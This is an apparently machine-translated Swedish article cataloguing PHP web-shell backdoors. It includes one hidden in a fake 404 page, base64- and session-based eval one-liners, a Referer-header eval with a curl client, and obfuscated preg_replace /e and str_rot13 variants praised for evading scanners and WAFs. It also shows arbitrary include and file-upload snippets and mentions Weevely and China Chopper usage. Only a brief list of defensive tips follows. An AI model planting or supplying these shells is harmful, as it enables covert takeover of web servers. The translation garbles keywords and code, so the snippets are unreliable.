Vi behandlar dessa PHP-bakdörrsprogram med en lärandementalitet, och mycket PHP-bakdörrskod låter oss se hur välmenande programmerare är.
Kraftfull PHP-bakdörr i en mening
Denna typ av bakdörr möjliggör webbplatser,Serveradministratörer är mycket besvärliga och måste ofta byta metoder för att utföra olika upptäckter, och många nya skrivtekniker kan inte upptäckas och hanteras med vanliga detektionsmetoder.
Idag kommer vi att räkna några intressanta PHP-trojaner.
1. Dölj PHP-ponnyer med hjälp av 404 sidor:
[mw_shl_code=php, sant] <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 ej hittad</title> </head><body> <h1>Ej hittad</h1> <p>Den begärda URL:en hittades inte på denna server.</p> </body></html> <?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); header ('HTTP/1.1 404 ej hittad'); ?>[/mw_shl_code]
404-sidan är en vanligt använd fil på webbplatsen, och få kommer att kontrollera och ändra den efter att den generellt rekommenderats, så vi kan använda den för att dölja bakdörren.
2. Funktionslös dold PHP i en mening:
[mw_shl_code=php,true]<?php session_start(); $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\']))','a'); ?>[/mw_shl_code]
Tilldela $_POST['kod'] till $_SESSION['koden'], och kör sedan $_SESSION['koden'], med besväret att det inte finns någon signaturkod.
Om du använder ett skanningsverktyg för att kontrollera koden kommer det inte att larma och uppnå målet.
3. Super smygande PHP-bakdörr:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?> [/mw_shl_code]
ENSAM GET-funktionen utgör en trojan;
Hur man använder:
[mw_shl_code=php, sant] ?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
Efter exekvering genererar den aktuella katalogen c.php en satstrojan, när parametern A utvärderas misslyckades felet trojangenerering, och när den assert rapporterar den också ett fel, men genererar en trojanhäst som inte får underskattas.
Nivåförfrågan, kod för att köra PHP-bakdörren:
Denna metod implementeras med två filer, fil 1
[mw_shl_code=php,true]<?php
//1.php header('Content-type:text/html; charset=utf-8′); parse_str($_SERVER['HTTP_REFERER'], $a); if(reset($a) == '10'&& count($a) == 9) { eval(base64_decode(str_replace(", "+", implode(array_slice($a, 6)))));
} ?>[/mw_shl_code]
Dokument 2
[mw_shl_code=php,true]<?php
//2.php header('Content-type:text/html; charset=utf-8′);
//要执行的代码 $code= <<<KOD phpinfo(); KOD;
//进行base64编码 $code= base64_encode($code);
//构造referer字符串 $referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url $url= 'http://localhost/test1/1.php'; $ch= curl_init(); $options= array( CURLOPT_URL => $url, CURLOPT_HEADER => FALSKT, CURLOPT_RETURNTRANSFER => SANT, CURLOPT_REFERER => $referer ); curl_setopt_array($ch, $options); echocurl_exec($ch); ?>[/mw_shl_code]
Kör base64-kodad kod genom HTTP_REFERER i HTTP-förfrågan för att uppnå backdoor-effekten.
Det är bra att använda den här idén för att kringgå WAF.
4.PHP backdoor-generatorverktyg Weevely
weevely är en PHP-specifik sådanWebshell-fri programvara kan användas för att simulera ett anslutningsskal liknande telnet, Weevely används vanligtvis för exploatering av webbprogram, dölja bakdörrar eller använda telnet-liknande metoder istället för webbsidbaserad hantering, serversidan PHP-koden som genereras av Weevely är base64-kodad, vilket gör att den kan vilseleda mainstream antivirusprogram och IDS, När du laddar upp serverkoden kan du oftast köra den direkt via Weevely.
Funktionerna som används i bakdörren är vanliga strängbehandlingsfunktioner, och funktioner som utvärdering och system som används som inspektionsregler kommer inte att visas direkt i koden, så att bakdörrsfilen kan kringgå kontrollen av bakdörrssökverktyget. Att skanna med dark groups webbverktyg för bakdörrsdetektering visar att filen inte är hotad.
Ovanstående är en allmän introduktion, och de relevanta användningsmetoderna presenteras inte här, utan en enkel vetenskaplig popularisering.
4. Tre deformerade en-mening PHP-trojaner Den första:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?> [/mw_shl_code]
Den andra
[mw_shl_code=php,true]<?php $_=“”; $_[+“”]=”; $_=“$_”.“”; $_=($_[+“”]|“ ”). ($_[+“”]|“”). ($_[+“”]^“”); ?> <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>[/mw_shl_code]
Skriv http://site/2.php?_=assert&__=eval($_POST['pass']) lösenord i kökskniven är pass.
Om du använder den extra informationen från kökskniven är den mer dold, eller så kan du använda andra injektionsverktyg eftersom den skickas in i efterhand.
Den tredje
[mw_shl_code=php, sant] ($b 4dboy= $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'lägg till'); [/mw_shl_code]
str_rot13 ("riny") är den kodade utvärderingen, som helt undviker nyckelord utan att förlora effekten, vilket får folk att kräkas blod!
5. Slutligen, lista några avancerade PHP-trojan-bakdörrar:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”; $hh("/[discuz]/e",$_POST['h'],"Access"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid']; inkludera($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg="c"." o”.“ p”.“ y”; $reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]); [/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”; $gzid("/[discuz]/e",$_POST['h'],"Access"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST [mw_shl_code=php, sant]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
Sammanfattningsvis kan dessa PHP-bakdörrar beskrivas som kompletta, om du inte är försiktig kommer du definitivt att bli lurad, och vad är dagens högsta prioritet i vår artikel? De viktigaste punkterna finns i sammanfattningen nedan!
Hur man hanterar en en-mening bakdörr med en mening: Vi betonar några viktiga punkter, och om du läser den här artikeln tror jag att du inte är en lekman, så jag kommer inte att vara långrandig:
- Var uppmärksam på säkerheten när du skriver PHP-program
- Serverloggfiler bör läsas ofta och säkerhetskopieras ofta
- Strikt behörighetstilldelning för varje plats
- Frekventa batchsäkerhetsgranskningar av dynamiska filer och kataloger
- Lär dig hur du utför manuell antivirus "Behavioral Judgment Investigation and Killing"
- Håll utkik, eller infiltrera ett aktivt cybersäkerhetsläger
- Till och med en funktion kan användas som en regel för hierarkisk bearbetning av servermiljön
Vi tror att när det finns fler sajter att hantera och en stor mängd data, bör vi rimligen använda några hjälpverktyg, men vi ska inte helt förlita oss på dessa verktyg, teknologin uppdateras och förbättras ständigt, det viktigaste är att du lär dig och förstår tankesättet bakom dessa kraftfulla bakdörrspersoner, och rollöverföringen kan ge dig större framsteg.
|